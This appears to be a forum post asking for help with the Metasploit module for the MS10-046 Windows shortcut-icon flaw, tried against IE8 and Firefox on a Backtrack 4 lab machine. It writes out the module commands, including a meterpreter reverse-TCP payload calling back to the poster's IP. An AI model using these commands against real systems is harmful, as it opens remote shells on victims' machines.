I have a question about the exploit mentioned above:
I tried to set up the following:
> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST <my IP>
> set SRVHOST <my IP>
--> exploit starts, an prints something like that to the screen:
"send victims to \\<my IP>\foobar"
Then I browse to this IP, or exactly this path, but not the expected part happens:
In the IE 8, it says "Cant find the file \\<my IP>\foobar", and neither in the IE nor in the metasploit anything happens.
When I browse to http://<my IP>, then the site loads, and metasploit says, "UNC redirect to <my IP>:<random IP>" - but nothing happens^^
When I do the same with Firefox 3.6.3 (browse to \\<my IP>\foobar), then I also see "Cant find file".
And when I browse to http://<my IP>, it shows something like this:
http://<my IP>/\\<my IP>\foobar
And in metasploit I see lots of redirects like "UNC redirect to <my IP>:<random IP".
Hopefully someone sees the mistake I cant...
PS.: <my IP> ist the IP of the Backtrack 4 machine